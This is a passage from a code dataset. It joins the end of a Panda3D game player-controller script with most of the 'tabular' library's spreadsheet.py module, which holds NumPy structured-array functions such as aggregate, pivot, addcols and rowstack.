self.arm.setPos(0,0,0.2)
self.np = np
PHYSICS['WORLD'].attachRigidBody(node)
#self.character = BulletCharacterControllerNode(shape, 1, 'Player')
#-------------------------------------------------------------------#
# PLAYER GRAVITY SETTINGS AND FALL SPEED #
#self.character.setGravity(0.87)
#self.character.setFallSpeed(0.3)
#
#-------------------------------------------------------------------#
#self.characterNP = GAMEPLAY_NODES['PLAYER'].attachNewNode(self.character)
#self.characterNP.setPos(0, 0, 2) # May need some tweaking
#self.characterNP.setCollideMask(BitMask32.allOn())
# Attach the character to the base _Physics
#PHYSICS['WORLD'].attachCharacter(self.character)
# Reparent the camera to the player
#base.camera.reparentTo(self.np)
#base.camera.setPos(0,0,0.79)
#base.camLens.setNearFar(camNear,camFar)
base.camLens.setFov(90)
base.disableMouse()
gui = Crosshair()
self.arm = loader.loadModel('../assets/models/test.egg')
screens = self.arm.findAllMatches('**')
self.arm_screen = None
rot = 0
pos = 0
for screen in screens :
if screen.hasTag('screen'):
self.arm_screen = screen
rot = screen.getHpr()
pos = screen.getPos()
print("rotation"+str(rot))
self.actor = Actor('../assets/models/test.egg', {'anim1':'../assets/models/test-Anim0.egg'})
self.actor.reparentTo(self.np)
self.actor.loop('anim1')
self.actor.setPos(.0,-0.1,0.4)
self.actor.setH(180)
self.actor.node().setBounds(OmniBoundingVolume())
self.actor.node().setFinal(True)
#self.actor.setTwoSided(True)
#self.actor.reparentTo(self.world.buffer_system.geom_cam)
#self.actor.hide(self.world.buffer_system.light_mask)
# attach smth to hand
picker = self.actor.exposeJoint(None,"modelRoot","hand_picker")
arm_bone = self.actor.exposeJoint(None,"modelRoot","screen_picker")
self.arm_screen.reparentTo(arm_bone)
self.arm_screen.setH(self.arm_screen.getH()+90)
self.temp_animate = self.arm_screen
self.picker = picker
taskMgr.add(self.update,'update player position')
# Player Debug:
#print ""
#print "Player Character controller settings: "
#print ""
#print "Character Gravity: ", self.character.getGravity()
#print "Character Max Slope: ",self.character.getMaxSlope()
#print ""
def up(self):
self.direction += Vec3(0,1,0)
self.angular_direction += Vec3(1,0,0)
def down(self):
self.direction += Vec3(0,-1,0)
def left(self):
self.direction += Vec3(-1,0,0)
def right(self):
self.direction += Vec3(1,0,0)
def idle(self, key):
if(key == "up"):
self.direction -= Vec3(0,1,0)
self.angular_direction -= Vec3(1,0,0)
elif(key == "down"):
self.direction -= Vec3(0,-1,0)
elif(key == "left"):
self.direction -= Vec3(-1,0,0)
elif(key == "right"):
self.direction -= Vec3(1,0,0)
# Handle player jumping
def jump(self):
self.character.setMaxJumpHeight(2.3)
self.character.setJumpSpeed(4.5)
self.character.doJump()
# Handle player crouch. <Buged to shit>
def crouch(self):
self.crouching = not self.crouching
sz = self.crouching and 0.6 or 1.0
#self.character.getShape().setLocalScale(Vec3(1, 1, sz))
self.characterNP.setScale(Vec3(1, 1, sz) * 0.3048)
#self.characterNP.setPos(0, 0, -1 * sz)
# Handle player mouse
def look(self, task):
dt = globalClock.getDt()
# Handle mouse
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
self.omega = (x - self.winXhalf)*-mouseSpeed
base.camera.setP( (clampScalar(-90,90, base.camera.getP() - (y - self.winYhalf)*0.09)) )
self.processInput(dt)
return task.cont
def update(self,task):
dt = globalClock.getDt()
self.np.setPos(self.np,self.direction * dt * self.speed)
base.camera.setPos(self.np.getPos()+ Vec3(0,0,0.79))
md = base.win.getPointer(0)
x = md.getX()
y = md.getY()
if base.win.movePointer(0, self.winXhalf, self.winYhalf):
base.camera.setP(base.camera.getP() - (y - self.winYhalf)*dt*self.angular_speed)
self.np.setH(self.np.getH() - (x - self.winXhalf)*dt*self.angular_speed)
base.camera.setH(self.np.getH())
base.camera.setR(self.np.getR())
self.node.setAngularFactor(0)
self.node.setAngularVelocity(0)
BUFFER_SYSTEM['main'].reflection_cube.setPos(base.camera.getPos())
BUFFER_SYSTEM['main'].reflection_cube.setHpr(base.camera.getHpr())
return task.cont
# Handle player input
def processInput(self, dt):
print(self.direction)
speed = Vec3(0, 0, 0)
#@param PCSpeed: Player move speed under devconfig.py
if inputState.isSet('forward'): speed.setY( PCSpeed)
if inputState.isSet('reverse'): speed.setY(-PCSpeed)
if inputState.isSet('left'): speed.setX(-PCSpeed)
if inputState.isSet('right'): speed.setX( PCSpeed)
self.character.setAngularMovement(self.omega)
self.character.setLinearMovement(speed, True)
| bsd-3-clause | 5,954,991,454,922,168,000 | 31.701587 | 101 | 0.558878 | false |
yamins81/tabular | tabular/spreadsheet.py | 1 | 57202 | """
Spreadsheet-style functions for NumPy ndarray with structured dtype or
recarray objects:
aggregate, aggregate_in, pivot, addrecords, addcols, deletecols, renamecol,
replace, colstack, rowstack, nullvalue
Note that these functions are also wrapped as methods of the tabular tabarray
object, which is a subclass of the numpy ndarray.
**See Also:**
:class:`tabular.tab.tabarray`
"""
__all__ = ['aggregate', 'aggregate_in', 'pivot', 'addrecords', 'addcols',
'deletecols', 'renamecol', 'replace', 'colstack', 'rowstack',
'join', 'strictjoin', 'DEFAULT_RENAMER']
import numpy as np
import types
import tabular.utils as utils
import tabular.fast as fast
from tabular.colors import GrayScale
def isftype(x):
a = lambda x : isinstance(x,types.FunctionType)
b = isinstance(x,types.BuiltinFunctionType)
c = isinstance(x,types.MethodType)
d = isinstance(x,types.BuiltinMethodType)
return a or b or c or d
def aggregate(X, On=None, AggFuncDict=None, AggFunc=None,
AggList=None, returnsort=False, KeepOthers=True,
keyfuncdict=None):
"""
Aggregate a ndarray with structured dtype (or recarray) on columns for
given functions.
Aggregate a numpy recarray (or tabular tabarray) on a set of specified
factors, using specified aggregation functions.
Intuitively, this function will aggregate the dataset `X` on a set of
columns, whose names are listed in `On`, so that the resulting aggregate
data set has one record for each unique tuples of values in those columns.
The more factors listed in `On` argument, the "finer" is the aggregation,
the fewer factors, the "coarser" the aggregation. For example, if::
On = 'A'
the resulting tabarray will have one record for each unique value of a in
X['A'], while if On = ['A', 'B'] then the resulting tabarray will have
one record for each unique (a, b) pair in X[['A', 'B']]
The `AggFunc` argument is a function that specifies how to aggregate the
factors _not_ listed in `On`, e.g. the so-called `Off` columns. For
example. For instance, if On = ['A', 'B'] and `C` is a third column, then ::
AggFunc = numpy.mean
will result in a tabarray containing a `C` column whose values are the
average of the values from the original `C` columns corresponding to each
unique (a, b) pair.
If you want to specify a different aggreagtion method for each `Off` column,
use `AggFuncDict` instead of AggFunc. `AggFuncDict` is a dictionary of
functions whose keys are column names. AggFuncDict[C] will be applied to
the C column, AggFuncDict[D] to the D column, etc. AggFunc and AggFuncDict
can be used simultaneously, with the elements of AggFuncDict overriding
AggFunc for the specified columns.
Using either AggFunc or AggFuncDict, the resulting tabarray has the same
columns as the original tabarray. Sometimes you want to specify the ability
to create new aggregate columns not corresponding to one specific column in the
original tabarray, and taking data from several. To achieve this, use the
AggList argument. AggList is a list of three-element lists of the form:
(name, func, col_names)
where `name` specifies the resulting column name in the aggregated tabarray,
`func` specifies the aggregation function, and `col_names` specifies the
list of columns names from the original tabarray that will be needed to
compute the aggregate values. (That is, for each unique tuple `t` in the `On`
columns, the subarray of X[col_names] for which X[On] == t is passed to
`func`.)
If an `Off` column is _not_ provided as a key in `AggFuncDict`, a default
aggregator function will be used: the sum function for numerical columns,
concatenation for string columns.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to aggregate.
**On** : string or list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT
in `On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**AggList** : list, optional
List of tuples
**returnsort** : Boolean, optional
If `returnsort == True`, then return a list of indices
describing how `X` was sorted as a result of aggregation.
Default value is `False`.
**Returns**
**agg** : numpy ndarray with structured dtype
Aggregated data set.
**index_array** : numpy ndarray (int, 1D)
Returned only if `returnsort == True`. List of indices
describing how `X` was sorted as a result of aggregation.
**See also:**
:func:`tabular.spreadsheet.aggregate_in`
"""
names = X.dtype.names
if len(X) == 0:
if returnsort:
return [X,None]
else:
return X
if On == None:
On = []
elif isinstance(On,str):
On = On.split(',')
assert all([o in names for o in On]), \
("Axes " + str([o for o in On if o not in names]) +
" can't be found.")
if AggList is None:
AggList = []
if AggFuncDict:
AggList += AggFuncDict.items()
for (i,x) in enumerate(AggList):
if utils.is_string_like(x):
AggList[i] = (x,)
elif isinstance(x,tuple):
assert 1 <= len(x) <= 3
assert isinstance(x[0],str)
if len(x) == 2 and isinstance(x[1],tuple):
assert len(x[1]) == 2
AggList[i] = (x[0],) + x[1]
else:
raise ValueError, 'bork'
Names = [x[0] for x in AggList]
assert Names == utils.uniqify(Names)
if KeepOthers:
AggList = [(x,) for x in X.dtype.names if x not in Names + On] + AggList
DefaultChoices = {'string':[], 'sum':[], 'first':[]}
for (i,v) in enumerate(AggList):
if len(v) == 1:
assert v[0] in X.dtype.names
if AggFunc:
AggList[i] = v + (AggFunc,v[0])
else:
AggList[i] = v + (DefaultChooser(X,v[0], DefaultChoices),v[0])
elif len(v) == 2:
if isftype(v[1]):
assert v[0] in X.dtype.names
AggList[i] = v + (v[0],)
elif utils.is_string_like(v[1]):
if AggFunc:
_a = v[1] in X.dtype.names
_b = isinstance(v[1],list) and set(v[1]) <= set(X.dtype.names)
assert _a or _b
AggList[i] = (v[0], AggFunc, v[1])
else:
assert v[1] in X.dtype.names
AggList[i] = (v[0],
DefaultChooser(X,v[1],
DefaultChoices),
v[1])
else:
raise ValueError,'No specific of name for column.'
elif len(v) == 3:
if utils.is_string_like(v[2]):
assert isftype(v[1]) and v[2] in X.dtype.names
else:
assert isftype(v[1]) and \
(isinstance(v[2],list) and \
set(v[2]) <= set(X.dtype.names))
if len(DefaultChoices['sum']) > 0:
print('No aggregation function provided for', DefaultChoices['sum'],
'so assuming "sum" by default.')
if len(DefaultChoices['string']) > 0:
print('No aggregation function provided for', DefaultChoices['string'],
'so assuming string concatenation by default.')
if len(DefaultChoices['first']) > 0:
print('No aggregation function provided for', DefaultChoices['first'],
'and neither summing nor concatenation works, so choosing '
'first value by default.')
return strictaggregate(X, On, AggList, returnsort, keyfuncdict)
def DefaultChooser(X,o,DC):
try:
sum(X[o][0:1])
DC['sum'].append(o)
return sum
except:
try:
''.join(X[o][0:1])
DC['string'].append(o)
return ''.join
except:
DC['first'].append(o)
return lambda x : x[0]
def strictaggregate(X,On,AggList,returnsort=False, keyfuncdict=None):
if len(On) > 0:
#if len(On) == 1:
# keycols = X[On[0]]
#else:
# keycols = X[On]
keycols = X[On]
if keyfuncdict is not None:
for _kf in keyfuncdict:
fn = keyfuncdict[_kf]
keycols[_kf] = np.array(map(fn, keycols[_kf]))
[D, index_array] = fast.recarrayuniqify(keycols)
X = X[index_array]
Diffs = np.append(np.append([-1], D[1:].nonzero()[0]), [len(D)])
else:
Diffs = np.array([-1, len(X)])
argcounts = dict([(o,
f.func_code.co_argcount - (len(f.func_defaults) if \
f.func_defaults != None else 0) if 'func_code' in dir(f) else 1)
for (o,f,g) in AggList])
OnCols = utils.fromarrays([X[o][Diffs[:-1]+1] for o in On],
type=np.ndarray, names=On)
AggColDict = dict([(o,
[f(X[g][Diffs[i]+1:Diffs[i+1]+1]) if argcounts[o] == 1 else \
f(X[g][Diffs[i]+1:Diffs[i+1]+1],X) for i in range(len(Diffs) - 1)]) \
for (o,f,g) in AggList])
if isinstance(AggColDict[AggList[0][0]][0],list) or \
isinstance(AggColDict[AggList[0][0]][0],np.ndarray):
lens = map(len, AggColDict[AggList[0][0]])
OnCols = OnCols.repeat(lens)
for o in AggColDict.keys():
AggColDict[o] = utils.listunion(AggColDict[o])
Names = [v[0] for v in AggList]
AggCols = utils.fromarrays([AggColDict[o] for o in Names],
type=np.ndarray, names=Names)
if returnsort:
return [colstack([OnCols,AggCols]),index_array]
else:
return colstack([OnCols,AggCols])
def aggregate_in(Data, On=None, AggFuncDict=None, AggFunc=None, AggList=None,
interspersed=True):
"""
Aggregate a ndarray with structured dtype or recarray
and include original data in the result.
Take aggregate of data set on specified columns, then add the resulting
rows back into data set to make a composite object containing both original
non-aggregate data rows as well as the aggregate rows.
First read comments for :func:`tabular.spreadsheet.aggregate`.
This function returns a numpy ndarray, with the number of rows equaling::
len(Data) + len(A)
where `A` is the the result of::
Data.aggregate(On,AggFuncDict)
`A` represents the aggregate rows; the other rows were the original data
rows.
This function supports _multiple_ aggregation, meaning that one can first
aggregate on one set of factors, then repeat aggregation on the result for
another set of factors, without the results of the first aggregation
interfering the second. To achieve this, the method adds two new columns:
* a column called "__aggregates__" specifying on which factors the rows
that are aggregate rows were aggregated. Rows added by aggregating on
factor `A` (a column in the original data set) will have `A` in the
"__aggregates__" column. When multiple factors `A1`, `A2` , ... are
aggregated on, the notation is a comma-separated list: `A1,A2,...`.
This way, when you call `aggregate_in` again, the function only
aggregates on the columns that have the empty char '' in their
"__aggregates__" column.
* a column called '__color__', specifying Gray-Scale colors for
aggregated rows that will be used by the Data Environment system
browser for colorizing the data. When there are multiple levels of
aggregation, the coarser aggregate groups (e.g. on fewer factors) get
darker gray color then those on finer aggregate groups (e.g. more
factors).
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate_in`.
**Parameters**
**Data** : numpy ndarray with structured dtype or recarray
The data set to aggregate in.
**On** : list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT in
`On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**interspersed** : boolean, optional
* If `True`, aggregate rows are interleaved with the data
of which they are aggregates.
* If `False`, all aggregate rows placed at the end of the
array.
**Returns**
**agg** : numpy ndarray with structured dtype
Composite aggregated data set plus original data set.
**See also:**
:func:`tabular.spreadsheet.aggregate`
"""
# See if there's an '__aggregates__ column'.
# If so, strip off all those that are nontrivial.
Data = deletecols(Data,'__color__')
if '__aggregates__' in Data.dtype.names:
X = Data[Data['__aggregates__'] == ''][:]
OldAggregates = Data[Data['__aggregates__'] != ''][:]
AggVars = utils.uniqify(utils.listunion([x.split(',') for x in
OldAggregates['__aggregates__']]))
else:
X = Data
OldAggregates = Data[0:0]
AggVars = []
if On == None:
On = []
NewAggregates = aggregate(X, On, AggFuncDict=AggFuncDict,
AggFunc=AggFunc, AggList=AggList, KeepOthers=True)
on = ','.join(On)
NewAggregates = addcols(NewAggregates,
utils.fromarrays([[on]*len(NewAggregates)],
type=np.ndarray, names=['__aggregates__']))
AggVars = utils.uniqify(AggVars + On)
Aggregates = rowstack([OldAggregates,NewAggregates],mode='nulls')
ANLen = np.array([len(x.split(',')) for x in Aggregates['__aggregates__']])
U = np.array(utils.uniqify(ANLen)); U.sort()
[A,B] = fast.equalspairs(ANLen,U)
Grays = np.array(grayspec(len(U)))
AggColor = utils.fromarrays([Grays[A]], type=np.ndarray,
names = ['__color__'])
Aggregates = addcols(Aggregates,AggColor)
if not interspersed or len(AggVars) == 0:
return rowstack([X,Aggregates],mode='nulls')
else:
s = ANLen.argsort()
Aggregates = Aggregates[s[range(len(Aggregates) - 1, -1, -1)]]
X.sort(order = AggVars)
Diffs = np.append(np.append([0], 1 + (X[AggVars][1:] !=
X[AggVars][:-1]).nonzero()[0]), [len(X)])
DiffAtts = ([[t for t in AggVars if X[t][Diffs[i]] != X[t][Diffs[i+1]]]
for i in range(len(Diffs) - 2)]
if len(Diffs) > 2 else []) + [AggVars]
HH = {}
for l in utils.uniqify(Aggregates['__aggregates__']):
Avars = l.split(',')
HH[l] = fast.recarrayequalspairs(X[Avars][Diffs[:-1]],
Aggregates[Avars])
Order = []
for i in range(len(Diffs)-1):
Order.extend(range(Diffs[i], Diffs[i+1]))
Get = []
for l in HH.keys():
Get += [len(X) + j for j in
HH[l][2][range(HH[l][0][i], HH[l][1][i])] if
len(set(DiffAtts[i]).intersection(
Aggregates['__aggregates__'][j].split(','))) > 0 and
set(Aggregates['__aggregates__'][j].split(',')) ==
set(l.split(','))]
Order.extend(Get)
return rowstack([X, Aggregates], mode='nulls')[Order]
def grayspec(k):
"""
List of gray-scale colors in HSV space as web hex triplets.
For integer argument k, returns list of `k` gray-scale colors, increasingly
light, linearly in the HSV color space, as web hex triplets.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
**Parameters**
**k** : positive integer
Number of gray-scale colors to return.
**Returns**
**glist** : list of strings
List of `k` gray-scale colors.
"""
ll = .5
ul = .8
delta = (ul - ll) / k
return [GrayScale(t) for t in np.arange(ll, ul, delta)]
def pivot(X, a, b, Keep=None, NullVals=None, order = None, prefix='_'):
'''
Implements pivoting on numpy ndarrays (with structured dtype) or recarrays.
See http://en.wikipedia.org/wiki/Pivot_table for information about pivot
tables.
Returns `X` pivoted on (a,b) with `a` as the row axis and `b` values as the
column axis.
So-called "nontrivial columns relative to `b`" in `X` are added as
color-grouped sets of columns, and "trivial columns relative to `b`" are
also retained as cross-grouped sets of columns if they are listed in `Keep`
argument.
Note that a column `c` in `X` is "trivial relative to `b`" if for all rows
i, X[c][i] can be determined from X[b][i], e.g the elements in X[c] are in
many-to-any correspondence with the values in X[b].
The function will raise an exception if the list of pairs of value in
X[[a,b]] is not the product of the individual columns values, e.g.::
X[[a,b]] == set(X[a]) x set(X[b])
in some ordering.
Implemented by the tabarray method :func:`tabular.tab.tabarray.pivot`
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to pivot.
**a** : string
Column name in `X`.
**b** : string
Another column name in `X`.
**Keep** : list of strings, optional
List of other columns names in `X`.
**NullVals** : optional
Dictionary mapping column names in `X` other than `a` or
`b` to appropriate null values for their types.
If `None`, then the null values defined by the `nullvalue`
function are used, see
:func:`tabular.spreadsheet.nullvalue`.
**prefix** : string, optional
Prefix to add to `coloring` keys corresponding to
cross-grouped "trivial columns relative to `b`". Default
value is an underscore, '_'.
**Returns**
**ptable** : numpy ndarray with structured dtype
The resulting pivot table.
**coloring** : dictionary
Dictionary whose keys are strings and corresponding values
are lists of column names (e.g. strings).
There are two groups of keys:
* So-called "nontrivial columns relative to `b`" in `X`.
These correspond to columns in::
set(`X.dtype.names`) - set([a, b])
* Cross-grouped "trivial columns relative to `b`". The
`prefix` is used to distinguish these.
The `coloring` parameter is used by the the tabarray pivot
method, :func:`tabular.tab.tabarray.pivot`.
See :func:`tabular.tab.tabarray.__new__` for more
information about coloring.
'''
othernames = [o for o in X.dtype.names if o not in [a,b]]
for c in [a,b]:
assert c in X.dtype.names, 'Column ' + c + ' not found.'
[D,s] = fast.recarrayuniqify(X[[a,b]])
unique_ab = X[[a,b]][s[D.nonzero()[0]]]
assert len(X) == len(unique_ab) , \
('Pairs of values in columns', a, 'and', b, 'must be unique.')
[D,s] = fast.arrayuniqify(X[a])
unique_a = X[a][s[D.nonzero()[0]]]
[D,s] = fast.arrayuniqify(X[b])
unique_b = X[b][s[D.nonzero()[0]]]
Da = len(unique_a)
Db = len(unique_b)
if len(X) != Da * Db:
if list(X.dtype.names).index(a) < list(X.dtype.names).index(b):
n1 = a ; f1 = unique_a; n2 = b ; f2 = unique_b
else:
n1 = b ; f1 = unique_b; n2 = a ; f2 = unique_a
dtype = np.dtype([(n1,f1.dtype.descr[0][1]),(n2,f2.dtype.descr[0][1])])
allvalues = utils.fromarrays([np.repeat(f1,
len(f2)),
np.tile(f2,len(f1))],
np.ndarray,
dtype=dtype)
missingvalues = allvalues[np.invert(fast.recarrayisin(allvalues,
X[[a,b]]))]
if NullVals == None:
NullVals = {}
if not isinstance(NullVals,dict):
if hasattr(NullVals,'__call__'):
NullVals = dict([(o,NullVals(o)) for o in othernames])
else:
NullVals = dict([(o,NullVals) for o in othernames])
nullvals = utils.fromrecords([[NullVals[o] if o in NullVals.keys()
else utils.DEFAULT_NULLVALUE(X[o][0]) for o in
othernames]], type=np.ndarray, names=othernames)
nullarray = nullvals.repeat(len(missingvalues))
Y = colstack([missingvalues, nullarray])
Y = Y.astype(np.dtype([(o,
X.dtype[o].descr[0][1]) for o in Y.dtype.names]))
X = rowstack([X, Y])
X.sort(order = [a,b])
Bvals = X[b][:Db]
bnames = [str(bv).replace(' ','') for bv in Bvals]
assert (len(set(othernames).intersection(bnames)) == 0 and
a not in bnames), ('Processed values of column', b,
'musn\'t intersect with other column names.')
acol = X[a][::Db]
Cols = [acol]
names = [a]
Trivials = []
NonTrivials = []
for c in othernames:
Z = X[c].reshape((Da,Db))
if all([len(set(Z[:,i])) == 1 for i in range(Z.shape[1])]):
Trivials.append(c)
else:
NonTrivials.append(c)
Cols += [Z[:,i] for i in range(Z.shape[1])]
names += [bn + '_' + c for bn in bnames]
if order is not None:
ordering = [names.index(ord) for ord in order]
Cols = [Cols[i] for i in ordering]
names = [names[i] for i in ordering]
dtype = np.dtype([(n,c.dtype.descr[0][1]) for (n,c) in zip(names,Cols)])
D = utils.fromarrays(Cols,type=np.ndarray,dtype=dtype)
coloring = {}
if Keep != None:
Trivials = set(Trivials).intersection(Keep)
for c in Trivials:
X.sort(order=[c])
cvals = np.array(utils.uniqify(X[c]))
[AA,BB] = fast.equalspairs(cvals,X[c])
for (i,cc) in enumerate(cvals):
blist = [str(bv).replace(' ', '') for bv in Bvals if bv in
X[b][AA[i]:BB[i]]]
coloring[str(cc)] = [a] + [bn + '_' + d for bn in blist for d
in NonTrivials]
for d in NonTrivials:
coloring[str(cc) + '_' + d] = [a] + blist
for c in NonTrivials:
coloring[c] = [a] + [bn + '_' + c for bn in bnames]
for bn in bnames:
coloring[prefix + bn] = [a] + [bn + '_' + c for c in NonTrivials]
return [D, coloring]
def addrecords(X, new):
"""
Append one or more records to the end of a numpy recarray or ndarray .
Can take a single record, void or tuple, or a list of records, voids or
tuples.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addrecords`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The array to add records to.
**new** : record, void or tuple, or list of them
Record(s) to add to `X`.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new records.
**See also:** :func:`tabular.spreadsheet.rowstack`
"""
if isinstance(new, np.record) or isinstance(new, np.void) or \
isinstance(new, tuple):
new = [new]
return np.append(X, utils.fromrecords(new, type=np.ndarray,
dtype=X.dtype), axis=0)
def addcols(X, cols, names=None):
"""
Add one or more columns to a numpy ndarray.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addcols`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The recarray to add columns to.
**cols** : numpy ndarray, or list of arrays of columns
Column(s) to add.
**names**: list of strings, optional
Names of the new columns. Only applicable when `cols` is a
list of arrays.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new columns.
**See also:** :func:`tabular.spreadsheet.colstack`
"""
if isinstance(names,str):
names = [n.strip() for n in names.split(',')]
if isinstance(cols, list):
if any([isinstance(x,np.ndarray) or isinstance(x,list) or \
isinstance(x,tuple) for x in cols]):
assert all([len(x) == len(X) for x in cols]), \
'Trying to add columns of wrong length.'
assert names != None and len(cols) == len(names), \
'Number of columns to add must equal number of new names.'
cols = utils.fromarrays(cols,type=np.ndarray,names = names)
else:
assert len(cols) == len(X), 'Trying to add column of wrong length.'
cols = utils.fromarrays([cols], type=np.ndarray,names=names)
else:
assert isinstance(cols, np.ndarray)
if cols.dtype.names == None:
cols = utils.fromarrays([cols],type=np.ndarray, names=names)
Replacements = [a for a in cols.dtype.names if a in X.dtype.names]
if len(Replacements) > 0:
print('Replacing columns',
[a for a in cols.dtype.names if a in X.dtype.names])
return utils.fromarrays(
[X[a] if a not in cols.dtype.names else cols[a] for a in X.dtype.names] +
[cols[a] for a in cols.dtype.names if a not in X.dtype.names],
type=np.ndarray,
names=list(X.dtype.names) + [a for a in cols.dtype.names
if a not in X.dtype.names])
def deletecols(X, cols):
"""
Delete columns from a numpy ndarry or recarray.
Can take a string giving a column name or comma-separated list of column
names, or a list of string column names.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.deletecols`.
**Parameters**
**X** : numpy recarray or ndarray with structured dtype
The numpy array from which to delete columns.
**cols** : string or list of strings
Name or list of names of columns in `X`. This can be
a string giving a column name or comma-separated list of
column names, or a list of string column names.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy ndarray with structured dtype
given by `X`, excluding the columns named in `cols`.
"""
if isinstance(cols, str):
cols = cols.split(',')
retain = [n for n in X.dtype.names if n not in cols]
if len(retain) > 0:
return X[retain]
else:
return None
def renamecol(X, old, new):
"""
Rename column of a numpy ndarray with structured dtype, in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.renamecol`.
**Parameters**
**X** : numpy ndarray with structured dtype
The numpy array for which a column is to be renamed.
**old** : string
Old column name, e.g. a name in `X.dtype.names`.
**new** : string
New column name to replace `old`.
"""
NewNames = tuple([n if n != old else new for n in X.dtype.names])
X.dtype.names = NewNames
def replace(X, old, new, strict=True, cols=None, rows=None):
"""
Replace value `old` with `new` everywhere it appears in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.replace`.
**Parameters**
**X** : numpy ndarray with structured dtype
Numpy array for which in-place replacement of `old` with
`new` is to be done.
**old** : string
**new** : string
**strict** : boolean, optional
* If `strict` = `True`, replace only exact occurences of `old`.
* If `strict` = `False`, assume `old` and `new` are strings and
replace all occurences of substrings (e.g. like
:func:`str.replace`)
**cols** : list of strings, optional
Names of columns to make replacements in; if `None`, make
replacements everywhere.
**rows** : list of booleans or integers, optional
Rows to make replacements in; if `None`, make replacements
everywhere.
Note: This function does in-place replacements. Thus there are issues
handling data types here when replacement dtype is larger than original
dtype. This can be resolved later by making a new array when necessary ...
"""
if cols == None:
cols = X.dtype.names
elif isinstance(cols, str):
cols = cols.split(',')
if rows == None:
rows = np.ones((len(X),), bool)
if strict:
new = np.array(new)
for a in cols:
if X.dtype[a] < new.dtype:
print('WARNING: dtype of column', a,
'is inferior to dtype of ', new,
'which may cause problems.')
try:
X[a][(X[a] == old)[rows]] = new
except:
print('Replacement not made on column', a, '.')
else:
for a in cols:
QuickRep = True
try:
colstr = ''.join(X[a][rows])
except TypeError:
print('Not replacing in column', a, 'due to type mismatch.')
else:
avoid = [ord(o) for o in utils.uniqify(old + new + colstr)]
ok = set(range(256)).difference(avoid)
if len(ok) > 0:
sep = chr(list(ok)[0])
else:
ok = set(range(65536)).difference(avoid)
if len(ok) > 0:
sep = unichr(list(ok)[0])
else:
print('All unicode characters represented in column',
a, ', can\t replace quickly.')
QuickRep = False
if QuickRep:
newrows = np.array(sep.join(X[a][rows])
.replace(old, new).split(sep))
else:
newrows = np.array([aa.replace(old,new) for aa in
X[a][rows]])
X[a][rows] = np.cast[X.dtype[a]](newrows)
if newrows.dtype > X.dtype[a]:
print('WARNING: dtype of column', a, 'is inferior to the '
'dtype of its replacement which may cause problems '
'(ends of strings might get chopped off).')
def rowstack(seq, mode='nulls', nullvals=None):
'''
Vertically stack a sequence of numpy ndarrays with structured dtype
Analog of numpy.vstack
Implemented by the tabarray method
:func:`tabular.tab.tabarray.rowstack` which uses
:func:`tabular.tabarray.tab_rowstack`.
**Parameters**
**seq** : sequence of numpy recarrays
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['nulls', 'commons', 'abort']
Denotes how to proceed if the recarrays have different
dtypes, e.g. different sets of named columns.
* if `mode` == ``nulls``, the resulting set of columns is
determined by the union of the dtypes of all recarrays
to be stacked, and missing data is filled with null
values as defined by
:func:`tabular.spreadsheet.nullvalue`; this is the
default mode.
* elif `mode` == ``commons``, the resulting set of
columns is determined by the intersection of the dtypes
of all recarrays to be stacked, e.g. common columns.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack have different dtypes.
**Returns**
**out** : numpy ndarray with structured dtype
Result of vertically stacking the arrays in `seq`.
**See also:** `numpy.vstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.vstack.html>`_.
'''
if nullvals == None:
nullvals = utils.DEFAULT_NULLVALUEFORMAT
#newseq = [ss for ss in seq if len(ss) > 0]
if len(seq) > 1:
assert mode in ['commons','nulls','abort'], \
('"mode" argument must either by "commons", "abort", or "nulls".')
if mode == 'abort':
if not all([set(l.dtype.names) == set(seq[0].dtype.names)
for l in seq]):
raise ValueError('Some column names are different.')
else:
mode = 'commons'
if mode == 'nulls':
names = utils.uniqify(utils.listunion([list(s.dtype.names)
for s in seq if s.dtype.names != None]))
formats = [max([s.dtype[att] for s in seq if s.dtype.names != None
and att in s.dtype.names]).str for att in names]
dtype = np.dtype(zip(names,formats))
return utils.fromarrays([utils.listunion([s[att].tolist()
if (s.dtype.names != None and att in s.dtype.names)
else [nullvals(format)] * len(s) for s in seq])
for (att, format) in zip(names, formats)], type=np.ndarray,
dtype=dtype)
elif mode == 'commons':
names = [x for x in seq[0].dtype.names
if all([x in l.dtype.names for l in seq[1:]])]
formats = [max([a.dtype[att] for a in seq]).str for att in names]
return utils.fromrecords(utils.listunion(
[ar.tolist() for ar in seq]), type=np.ndarray,
names=names, formats=formats)
else:
return seq[0]
def colstack(seq, mode='abort',returnnaming=False):
"""
